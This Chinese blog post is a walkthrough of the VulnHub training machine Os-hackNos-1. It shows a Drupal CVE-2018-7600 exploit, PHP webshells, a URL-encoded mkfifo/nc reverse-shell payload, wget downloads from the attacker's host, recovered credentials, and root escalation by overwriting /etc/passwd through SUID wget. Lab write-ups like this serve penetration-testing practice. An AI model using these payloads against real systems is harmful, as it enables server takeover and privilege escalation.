vulnhub靶机 Os-hackNos-1

最新推荐文章于 2023-03-11 16:39:44 发布
最新推荐文章于 2023-03-11 16:39:44 发布
阅读量2.1k 收藏 4
点赞数 5
分类专栏: vulnhub靶机 文章标签: 安全 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/witwitwiter/article/details/119889384
版权

vulnhub靶机 Os-hackNos-1

靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401

目标为 普通用户的user.txt和root用户的root.txt

靶机配置

在将靶机文件下载下来为Os-hackNos-1.ova

使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e

请添加图片描述

向下翻动,将ro改为rw single init=/bin/bash

请添加图片描述

然后按下 ctrl+x进入shell

使用ip a查看ip地址

若发现无ip地址,则记住网卡名称,这里是ens33

请添加图片描述

使用

vim /etc/network/interfaces

对网卡信息进行编辑

请添加图片描述

如果在使用vim /etc/network/interfaces没有如上信息,则需要重新导入ova,即删掉此虚拟机,重新使用vm打开ova并导入。

使用

/etc/init.d/networking restart

进行网卡重启

若是返回networking没找到此命令,证明ova导入时文件缺失,需要重新导入ova。

进行渗透

靶机和kali在同一个网段。

使用nmap对此网段进行扫描

nmap 192.168.5.0/24 -O

其中靶机的信息如下

Nmap scan report for 192.168.5.132
Host is up (0.00047s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:B0:11:06 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

其中80端口开启了

则这里靶机ip地址为192.168.5.132

故存在网页,则使用dirsearch进行目录扫描

请添加图片描述

发现http://192.168.5.132/drupal/并进行访问

请添加图片描述

通过 http://192.168.0.142/drupal/CHANGELOG.txt 得知grupal的版本为 Drupal 7.57

请添加图片描述

在百度等搜索引擎中搜索该版本的漏洞,找到CVE-2018-7600

请添加图片描述

在github中下载该漏洞的exp

https://github.com/pimps/CVE-2018-7600

git clone https://github.com/pimps/CVE-2018-7600.git

在kali中

./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls

或者
python3 drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls

即可执行ls读取文件

请添加图片描述

在当前目录写一个一句话木马

这里参考的moonsec的

moon.php

<?php system($_POST['moon']);?>

这里写自己的webshell

php.php

<?php @eval($_POST['qwer']);?>

后者可以通过菜刀之类的webshell工具进行连接

这里用哥斯拉进行连接

请添加图片描述

请添加图片描述

或者采用第一种(即moon的方式)进行反弹shell

然后在当前目录开启python自带的httpserver

python -m SimpleHTTPServer

然后使用

./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/moon.php"

将php文件上传到靶机上

再使用

./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls

查看php木马是否上传成功

请添加图片描述

首先在kali中使用nc进行监听

nc -lvnp 9000

在浏览器中访问http://192.168.5.132/drupal/moon.php

使用burp进行抓包准备反弹shell

POST /drupal/moon.php HTTP/1.1

Host: 192.168.5.132

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: has_js=1

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 91



moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f

注意这里的 192.168.5.129为kali的ip地址

moon博客里写的是/bin/sh -i 但是我在测试时报错了

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.0.136+9001+>/tmp/f

我这里改为 /bin/bash

moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f

提交之后可以反弹一个shell

请添加图片描述

此时已经反弹成功

然后切换为python3的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

请添加图片描述

在网站根目录发现一个alexander.txt

使用cat获取其内容

www-data@hackNos:/var/www/html/drupal$ cd ..
cd ..
www-data@hackNos:/var/www/html$ ls
ls
alexander.txt  drupal  index.html
www-data@hackNos:/var/www/html$ cat alexander.txt
cat alexander.txt
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==

凭借经验看出这是base64加密的数据,将其使用base64解密

请添加图片描述

然后发现左边是Brainfuck

请添加图片描述

解密网站如下

https://www.splitbrain.org/services/ook

请添加图片描述

点击右下角Brainfuck to text即可解密

得到james:hacker@4514

通过查找,在home中找到james和其目录下的user.txt

www-data@hackNos:/home/james$ cat user.txt
cat user.txt
   _                                  
  | |                                 
 / __) ______  _   _  ___   ___  _ __ 
 \__ \|______|| | | |/ __| / _ \| '__|
 (   /        | |_| |\__ \|  __/| |   
  |_|          \__,_||___/ \___||_|   
                                      
                                      

MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

试着提权,先看看suid提权,需要搜索到,带有s的文件,开始查找。

find / -perm -u=s -type f 2>/dev/null

请添加图片描述

发现wget普通用户也可执行

那么提权的方式就是通过下载目标靶机上的passwd,然后构造一个有root权限的用户加入到构造的passwd文件中,然后使用wget -O将内容重定向输入到/etc/passwd中

首先通过cat /etc/passwd获取靶机密码

www-data@hackNos:/var/www/html/drupal$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
james:x:1000:1000:james,,,:/home/james:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
moon:$1$moon$8F2YI9c3zhkkS9SOsKawY0:0:0:root:/root:/bin/bash

复制到本地生成文件passwd

在kali中生成密码
请添加图片描述

将moon加入到伪造的passwd,并赋予root权限

请添加图片描述

将passwd放到开启了python httpserver的文件夹中

然后使用

./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/passwd -O /etc/passwd"

或者直接在已有的shell中进行

wget http://192.168.5.129:8000/passwd -O /etc/passwd

然后在已有的shell中进行切换用户

请添加图片描述


root@hackNos:/var/www# cd ~
cd ~
root@hackNos:~# ls
ls
root.txt
root@hackNos:~# cat root.txt
cat root.txt
    _  _                              _   
  _| || |_                           | |  
 |_  __  _|______  _ __  ___    ___  | |_ 
  _| || |_|______|| '__|/ _ \  / _ \ | __|
 |_  __  _|       | |  | (_) || (_) || |_ 
   |_||_|         |_|   \___/  \___/  \__|
                                          
                                          

MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Author : Rahul Gehlaut

Linkedin : https://www.linkedin.com/in/rahulgehlaut/

Blog : www.hackNos.com

注意事项

使用菜刀等webshell不能切换,因为su命令必须在终端中执行

su: must be run from a terminal

请添加图片描述

witwitwiter
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnhub靶机练习-Os-hackNos-1
yyj1781572的博客
11-25 653
vulnhub靶机练习-Os-hackNos-1
【解决办法】- 靶机导入VMware后无法自动获取IP地址
最新发布
weixin_45221204的博客
06-02 892
渗透测试过程,我们需要下载靶机文件,然后导入VMware等工具,部署自己的靶场环境,但是由于靶场作者等因素,导致无法渗透测试中,获取IP地址,我们就此问题给出实际解决方案。本文叙述了导入到Vmare的靶机无法获得IP地址的处理方案,其中涉及到的内容有linux基础操作(vim\dhclient)、VMware导入靶场操作等内容,操作相对简单。
vulhub - Os-hackNos-1
在下小黄的博客
09-09 514
一、环境搭建:Os-hackNos-1靶机 实验主机:kali linux 2021 虚拟机(VM) 实验靶机Os-hackNos-1靶机(VM) 实验网络:NAT模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 技能:漏洞利用 | web应用 | 暴力破解 | 权限提升 二、信息收集: 主机发现: 确认自己的信息: ifconfig 探测网段存活主机: nmap -sP 192.168.138.0/24 端口扫描: 探测操作系统及软
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 509
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
OS-HACKNOS-1
LainWith的博客
12-25 1032
目录介绍信息收集主机发现方法1网站探测目录扫描gobuster目录扫描查看drupal版本搜索EXPRCE-信息收集反弹shell目标1获取james的账密切换身份方法2网站探测dirb 目录扫描dirbuster挖掘drupal目录获取账号密码登录网站msf拿session提权目标2参考 介绍 难度:容易 ——> 中 flag: 两个, 一个是普通用户的user.txt、另外一个是root用户的user.txt 靶机的地址:https://www.vulnhub.com/entry/hacknos-
靶机Hacknos-1
weixin_50815573的博客
02-21 1620
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHubOs-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
VulnHubOs-hackNos-1
weixin_39219503的博客
12-22 530
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : exploit | Web Ap...
Hacknos-3靶机
weixin_52525624的博客
02-23 374
nmap -sP -v 192.168.1.0/24 nmap -sV -Pn -n 192.168.1.185 然后进行访问192.168.1.185 使用dirsearch进行目录扫描 dirsearch -u "http://192.168.1.185/" 访问这几个文件无果后回到站点主页面,发现 You need extra WebSec在其站点后面添加路径/websec/发现是一套CMS站点并扫描器后台登录页面/websec/admin 在title处发现Gila CMS字样.
RabbitMQ详细教程、包含安装、配置和使用及整合SpringBoot
ShockChen7的博客
03-11 1411
RabbitMQ 是一个消息中间件:它接受并转发消息。你可以把它当做一个快递站点,当你要发送一个包裹时,你把你的包裹放到快递站,快递员最终会把你的快递送到收件人那里,按照这种逻辑 RabbitMQ 是一个快递站,一个快递员帮你传递快件。RabbitMQ 与快递站的主要区别在于,它不处理快件而是接收,存储和转发消息数据。
线下靶机测试:hacknox-1
weixin_57567689的博客
08-30 605
对线下靶机进行测试
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 723
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
【协议分析】常用协议端口号
热门推荐
Walter的专栏
11-12 5万+
0      TCP  Reserved   0      UDP  Reserved   1      TCP tcpmux TCP Port Service Multiplexer Breach, SocketsDeTroie  1      UDP tcpmux TCP Port Service Multiplexer Sockets des Troie, SocketsDeTroie
No.48-VulnHub-hackNos: Os-hackNos-Walkthrough渗透学习
qq_34801745的博客
02-08 655
** VulnHub-hackNos: Os-hackNos-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 靶机难度:中级(CTF)–本人做完觉得是初级!! 靶机发布日期:2019年11月27日 靶机描述: Difficulty : Easy to Intermediate Flag : 2 Fl...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值